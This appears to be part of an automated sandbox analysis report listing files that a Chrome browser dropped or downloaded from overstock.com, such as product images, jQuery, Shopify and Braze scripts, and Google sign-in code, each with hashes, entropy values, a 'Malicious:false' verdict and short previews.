                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P......................................................................................8!...x...k..?..Jp:....x...5u.8.#.7.*p!..$.x.{|....a.?c..1..f.d._/mw..+.*.oL.#..R<......;)%....=..G....R...l}..............{yDZ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):586
                                                                                                                                                                                    Entropy (8bit):4.671484325644577
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Cv0M65dXgU8aYUOEdSkFGpmucWc18uMhHbvomjkpyX/jwN:t4Cv0MMkaNkmucv1TMJbtm2g
                                                                                                                                                                                    MD5:38A727A685535993A4821935FE1B99FD
                                                                                                                                                                                    SHA1:54DD7A41371BE5699AE8B8BFB0A391C4E7AF6251
                                                                                                                                                                                    SHA-256:0EE912C41CA99DA7831CD3A16A136CB52EBBCC53A0230CF7F31EF8BC69445894
                                                                                                                                                                                    SHA-512:F4264E3FBA14B607358BD43B72D36E16D6918AF0822486960328BD29DF9DD6A11B94BBE47C74D74839312A7AFEB998F86E782632D6139ECCEC28C295D7A3320D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 8 8">. <path fill-rule="evenodd" clip-rule="evenodd" d="M3.67444 0.212345L2.63552 2.41511L0.312205 2.7684C0.0139737 2.81375 -0.105114 3.19732 0.110683 3.41748L1.79181 5.13257L1.39507 7.55424C1.34414 7.86508 1.65586 8.10212 1.92259 7.9554L4.00049 6.81247L6.07838 7.9554C6.34512 8.10212 6.65683 7.86508 6.60591 7.55424L6.20916 5.13257L7.89029 3.41748C8.10609 3.19732 7.987 2.81375 7.68877 2.7684L5.36545 2.41511L4.32653 0.212345C4.19315 -0.0704562 3.80782 -0.0704562 3.67444 0.212345Z" fill="#bfbfbf"/>.</svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37428
                                                                                                                                                                                    Entropy (8bit):7.965857471670544
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:y7w31cT9Mk0PjOnfSI/FniYO+98AjxBQYg68IpfH:yseT22Bmc8OeYg6NfH
                                                                                                                                                                                    MD5:41460C24C40FA095F3CA6953138D7AD4
                                                                                                                                                                                    SHA1:92BB18E14E68AC6A3528D49785DBD39C244E54A2
                                                                                                                                                                                    SHA-256:12DE265EBA390B41455FDACF953ACB7C9D0B7773DC6CDDF62DA949303793107A
                                                                                                                                                                                    SHA-512:1E9CC046F905C89AFB81B44E1E1B029C8FE6FD329ABACDA6491B6723E71EA84ABFAECD13D1B7AAA57806092FCAE3FEEFBAC8A502F3DB5CFEA00F4A657BC7841E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Alexander-Home-Grant-Modern-Abstract-Area-Rug.jpg?v=1710949885&width=320
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................<.m...sZ..ia.s.D..gT.6.+....5..Y.....un...j$..I.(u.).t.z.A.f....Q....3L..G...l....*.},.e.5.\....~.i..k..z..*./?ES].....b.\/..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 250x250, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7586
                                                                                                                                                                                    Entropy (8bit):7.722854194672283
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NhIl/XrxDm4TgFK37Su1ZMDCkNoA5YK0qdZRpkOa7zvfJUidlHzLh2XDhmX/OnMH:NW9NgFK3WFCCYK0qheOaPVsWWpsrD
                                                                                                                                                                                    MD5:1E50932E5888993F8BB5B80F34D0E25C
                                                                                                                                                                                    SHA1:EDFA5C411FF7FA48CD632CC2A205CE30F2DB18AF
                                                                                                                                                                                    SHA-256:623B517CF1DE6C6A2C73AD1F0B0B369FD273EEF8E257490D66FE7723FAA3DDE2
                                                                                                                                                                                    SHA-512:21288394C52E124F51D6B4632EEA4DA8643F744774DBFB603D71B5070B07DA64DDC311DCEE35AFB72C05A5B3F49713195A5C124079D6C693FB1A42F899B74C3A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}............................................................................................,.......................................................]..)w..................tM.....ed+,.T....y..Z\Z[+L&.J<........G... *...5 +.. .JZ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):23054
                                                                                                                                                                                    Entropy (8bit):7.963693125225697
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:CD1m0+OSQ2ZD+ihHmkQ97I0F8giA7wGGVBykth3EStTLdDoFhV+RBW76/AoeGte0:ww0M/zhHmkQh8Xg01EStNDoIYOX+Sf
                                                                                                                                                                                    MD5:FDA1DA30C884E1633A9AC59027366977
                                                                                                                                                                                    SHA1:B4015D63D67946CE7F9C95F1BABA82E8B70DA919
                                                                                                                                                                                    SHA-256:7F3645821097AEA095F47FAD89F7605DA60AF36E2EE136AAAC2CBB1D6DF2D296
                                                                                                                                                                                    SHA-512:226D66E3FD38FEDCCD248A8F46F2704CCB3F230A3D51D9919A2EBB709B83B8E5E759AC3DE304EE2FD5B67B0251BEA90D92A417399E83AB0AD9F2214B21776472
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_9002dd94-b46f-4f5c-974f-27ed808adb8a.jpg?v=1729322885&width=640
                                                                                                                                                                                    Preview:RIFF.Z..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 vW...u...*....>=..D.!..... ...w0h=s..i.fJ.,.._..cj....=.._9...h.{..O.Sk........v/...........|.....?.?S9....^.;....G.[.o2..........5..50...........A.....?.2.0T_...B..... .@.Q|.....*/...!..E...d `...........A.....?.2.0T_...B..... .@.Q|.....*/...!..E...d `...........A.....?.2.0T_...B..... .@.Q|.....*/...!..E...d `...........A.....?.2.0T_...B..... .@.Q|.....*/...!..E...d `...........|....H.2^...n.;.,...+...8.T..XO..|7}....C%f*.%..g\.h...1..Pf ......g?...C........5o..|....?...G.zB`.t./.@vp...r=.(.....E.y....*....'2.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8298), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8298
                                                                                                                                                                                    Entropy (8bit):5.180172095910542
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:KwjyhENneOeca4vfv4ovaRViSpS7lHW2SQdIf6:KWeya4vfQovyV+lHTU6
                                                                                                                                                                                    MD5:125C7F6C7E3F3B32CA1A15AFBBC6935E
                                                                                                                                                                                    SHA1:7066F246643259315FB97D3E85F48F4D471AB27E
                                                                                                                                                                                    SHA-256:61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
                                                                                                                                                                                    SHA-512:15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)||1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (32461)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69246
                                                                                                                                                                                    Entropy (8bit):5.499115539817298
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:d2fwG1e7F2fy+WdsnMat95WnKFN0mI5KhvyEpH8dInSQu4cSStUkk0og0t:d2fIRZ+WOnZj5WnKFNY5KJpHNSQgWkk1
                                                                                                                                                                                    MD5:C8CE6A273CD1FD679985F0CFE1F63170
                                                                                                                                                                                    SHA1:066BE33802F4697A29C3A49DAD1A81785D8514A5
                                                                                                                                                                                    SHA-256:D83B7F084326A698DEC02C1131ECDB4E0D8432342AC8E4AC043A1BC80F5B1DA0
                                                                                                                                                                                    SHA-512:0BCDAC57F62C425D054CCA1D1C2459B0DC2C5548F8B6B26AD871B679A65A1FC7B302A61C181C977DA10223BB408E805FF82B362D503C16714DBFFFAFD3C4B2DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.tapcart.com/webbridge-sdk/webbridge.umd.js?shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:/**. * name: @tapcart/webbridge. * version: v1.10.0. * description: Tapcart WebBridge SDK. * homepage: https://github.com/tapcartinc/tapcart-webbridge. */.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(".tapcart-webbridge #tapcart-web-banner{display:none!important}.tapcart-webbridge footer,.tapcart-webbridge header,.tapcart-webbridge #footer,.tapcart-webbridge #header{display:none}.tapcart-webbridge iframe{display:none}")),document.head.appendChild(e)}}catch(t){console.error("vite-plugin-css-injected-by-js",t)}})();.(function(ae){typeof define=="function"&&define.amd?define(ae):ae()})(function(){"use strict";const ae=t=>t&&Object.keys(t).length===0&&t.constructor===Object;function rn(t){const e={};if(!Array.isArray(t))return e;for(const r of t)r&&r.name&&r.enabled&&(e[r.name]=r);return e}const nn=t=>{if(!t)return{};const e=n=>Array.isArray(n)?n.reduce((a,{namespace:s,key:i,value:o})=>(a[s]?a[s][i]=o:a[s]=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):502
                                                                                                                                                                                    Entropy (8bit):4.846328767345814
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:A1BRmRcDewSDJLfJ77vN8UYyXOVGqQqWSjJy/U6:gmRWejVLx77v+UhXOVGq3vjM/v
                                                                                                                                                                                    MD5:3D30157088D8A00CBAEA9E9F7477A293
                                                                                                                                                                                    SHA1:3C96D8A2D85DDD20F4F9DDB70C636A21A702E262
                                                                                                                                                                                    SHA-256:7FA301335A82162652791FDED5C6F62EC09CCE2B07BC3122AE55D9E06899ABD7
                                                                                                                                                                                    SHA-512:05B4DE97B7608AD5644A25C48C4F36DD05433D7734DBEC3748F6AB0C8B6E1365F405B26F7A2D840B53674186F11C94BDB632430BA089E1A8439E200ABBC94864
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-email-script.min.js?api_key=dc9d7751-8184-4d73-92ba-bc7abcb22008&sdk_url=sdk.iad-03.braze.com&shop=a37a28-2.myshopify.com&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:function reconcileEmail(i){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function o(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function t(e){const n=100;window.setTimeout(function(){if(o()!==null&&o().getUser()){e()}else{t(e)}},n)}t(function(){o().getDeviceId(function(e){var n=e;if(n==null){console.warn(`No active session, cannot set user email`)}else{o().getUser().setEmail(i)}})})}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2092)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2193
                                                                                                                                                                                    Entropy (8bit):5.097379721719103
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:1UaMR5dPIVMHeTRYLw8SUBFmzaPwdxTxN6S:1UaMRjVORYk0jmzaPwdxtp
                                                                                                                                                                                    MD5:215396237626D4E450D7785E6445729B
                                                                                                                                                                                    SHA1:0AF8579E261BC304636E785B2DA68E96FD20E318
                                                                                                                                                                                    SHA-256:170D40ADAF1C166FAE55981AAF685F3463D93E8D03CCF6D314083F67E4D959DE
                                                                                                                                                                                    SHA-512:731F6D551B490356C99ADE91CBF9E393F95E8EC615353947D71DFD21CE6370DA6A045E0B5EB9EDD03230CF094097C8B8EC9EF680B2211C2919338E8E3C2F0798
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/carousel-slider.js?v=150083067762605609661730157903
                                                                                                                                                                                    Preview:customElements.get("carousel-slider")||customElements.define("carousel-slider",class extends HTMLElement{constructor(){super()}connectedCallback(){this.carousel=this.querySelector(".grid-carousel"),this.initialize()}initialize(){this.carousel.style.display="block",this.flickity=new Flickity(this.carousel,{cellAlign:"left",groupCells:!0,contain:!0,resize:!0,draggable:!0,prevNextButtons:!1,fade:!1,cellSelector:".grid-item",initialIndex:0,pageDots:!1,wrapAround:!1,accessibility:!1,watchCSS:!0,dragThreshold:10}),this.flickity.on("change",index=>{const event=new CustomEvent("slider:slide-change",{detail:{id:this.getAttribute("id"),index}});document.dispatchEvent(event)})}}),customElements.get("carousel-navigation")||customElements.define("carousel-navigation",class extends HTMLElement{constructor(){super()}connectedCallback(){this.init()}init(retry=1,maxRetry=3){if(retry===maxRetry)return;const id=this.getAttribute("for");if(this.carouselComponent=document.querySelector(`#${id}`),!this.caro
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3395)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3396
                                                                                                                                                                                    Entropy (8bit):5.081841829974535
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:Mdab9dm1jA9hvR7E+01B+UiJPhOfCR0g6Fbf3WfJZy9vn:MdabY2JZ01iV/uzWqn
                                                                                                                                                                                    MD5:F4C61DB2EABCB9E723699663DB365077
                                                                                                                                                                                    SHA1:386557A62AC212BBAF9895FA6179406C0327D086
                                                                                                                                                                                    SHA-256:E6C8F79F5369F9E760540F8A5E0A6FC34073A35D1729CA0B89E8B3E386591986
                                                                                                                                                                                    SHA-512:E828B6A90763F6BC7A8226B73C8448F872ABF30F3F032986E9B577FB80CA19028006B36EDF84513C5022064A87AA613D684927E5DCE189D04FA2F06ABD222EB4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/StockProblemsLineItemList.DbYV5-zv.js
                                                                                                                                                                                    Preview:import{e as u,D as m,a as e,aa as o,az as b,a9 as g,aQ as f,b0 as l,b1 as k,b2 as s,G as S,E as _,b3 as P,b4 as h,b5 as L,S as d,b6 as I,b7 as c,b8 as C,b9 as T}from"./app.DfgMZONA.js";function z({quantity:n,previousQuantity:t}){const a=u(),{lineItems:{titleTypographyStyle:i,optionsTypographyStyle:r,optionsAppearance:p="subdued",optionsEmphasis:y}}=m();return e(b,{spacing:"none",inlineAlignment:"end",children:[e(o,{...{size:"small",appearance:p,emphasis:y,style:r},appearance:"subdued",accessibilityRole:"deletion",children:a("stock.item_label",{count:t},{one:"{{count}} item",other:"{{count}} items"})}),e(o,{style:i,children:a("stock.item_label",{count:n},{one:"{{count}} item",other:"{{count}} items"})})]})}const O="IDG1X",R={OutOfStockLabel:O};function v({merchandiseIssueType:n}){const t=u(),a=()=>{switch(n){case l.Unfulfillable:case l.Unavailable:return t("contextual_availability.unavailable_label","Unavailable");case l.Unpurchasable:case l.UnpurchasableB2B:return t("stock.unpurchasabl
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3139)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):232360
                                                                                                                                                                                    Entropy (8bit):5.548063538742615
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:mhvpRLxI5c2A415QyqVho8HMTm8auC6mfPnfxx:mh5vA5QyqccyhauC6+5x
                                                                                                                                                                                    MD5:FEABAD89994FCE25C074116EF6280B86
                                                                                                                                                                                    SHA1:7B8369E0233C74CF3C66079525D0BCFFA6D578EB
                                                                                                                                                                                    SHA-256:04CBD78DD1199EBF00A4F7DF1E0A6786DCF6B0CF4204E8EF76712AFCD29A58A1
                                                                                                                                                                                    SHA-512:44E0E8511681A3F0D41AC80705A5ED6C354149A2237BD0F6F38F76E043BB551A2315C953161B1DE3926522BA290AD27D5E8614801435BDD17C908FF452F46351
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://accounts.google.com/gsi/client
                                                                                                                                                                                    Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2e244000, 0x660, ]);.var aa,ba,ca,da,t,ea,ha,ia,ka;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1839
                                                                                                                                                                                    Entropy (8bit):6.57961887132552
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxLbDRTHB9fS+WEA+mJnis8Pgk:NBIl/XrxbQ+WEAnn64k
                                                                                                                                                                                    MD5:3F9C37C330959A1DA0E7DFCE747BED22
                                                                                                                                                                                    SHA1:C24E1AA5F92472768B157FC5892323C981FA20C7
                                                                                                                                                                                    SHA-256:F99B38CEA898F703B8B5B5642B4AB9C658AC51F12A95AB21F1229477EDC2632D
                                                                                                                                                                                    SHA-512:17CD8BA009757F4B30FB6E3904F7AE3B6FB59FFB5000F59A9D1CA144841C83F5F8B1AF54DA918164FE3BE46824DE5D9EC3B089A02D95CE650A4B9CAF5A978795
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P............................................................................................cY.O...R.#K..s.......1.Q..#.#7..t.S.....i5..D.%.^[.?o.sR.....5.)..r.....6..............;...........................!1AQ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (502), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):502
                                                                                                                                                                                    Entropy (8bit):4.846328767345814
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:A1BRmRcDewSDJLfJ77vN8UYyXOVGqQqWSjJy/U6:gmRWejVLx77v+UhXOVGq3vjM/v
                                                                                                                                                                                    MD5:3D30157088D8A00CBAEA9E9F7477A293
                                                                                                                                                                                    SHA1:3C96D8A2D85DDD20F4F9DDB70C636A21A702E262
                                                                                                                                                                                    SHA-256:7FA301335A82162652791FDED5C6F62EC09CCE2B07BC3122AE55D9E06899ABD7
                                                                                                                                                                                    SHA-512:05B4DE97B7608AD5644A25C48C4F36DD05433D7734DBEC3748F6AB0C8B6E1365F405B26F7A2D840B53674186F11C94BDB632430BA089E1A8439E200ABBC94864
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function reconcileEmail(i){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function o(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function t(e){const n=100;window.setTimeout(function(){if(o()!==null&&o().getUser()){e()}else{t(e)}},n)}t(function(){o().getDeviceId(function(e){var n=e;if(n==null){console.warn(`No active session, cannot set user email`)}else{o().getUser().setEmail(i)}})})}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 173337
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):47050
                                                                                                                                                                                    Entropy (8bit):7.994715016984044
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp56/ZcvbF+E8ycJIPOtjfdj8Mo64et4T+z:GU1wlZ5Su8dmY/T856/KbF+E8yPOlfdF
                                                                                                                                                                                    MD5:7A760B7359E13D5E1F6D88E9AC460696
                                                                                                                                                                                    SHA1:1DECB64D58BB4167D11D9A1FA6AB3F48AC287F55
                                                                                                                                                                                    SHA-256:7FF869CB401A4278E0DF3D51BA1823EC226C73B9512E0F25BE0F61C841ADFE22
                                                                                                                                                                                    SHA-512:11D59F4D17B8E8D5F69D95C57E354400F8DEAB373B273A3331F2D0BFC3D2A1419C577AA6A6A0F4FAAC68ADBC20D0986E81185DE92CDC4935B2EF514787CD96BE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
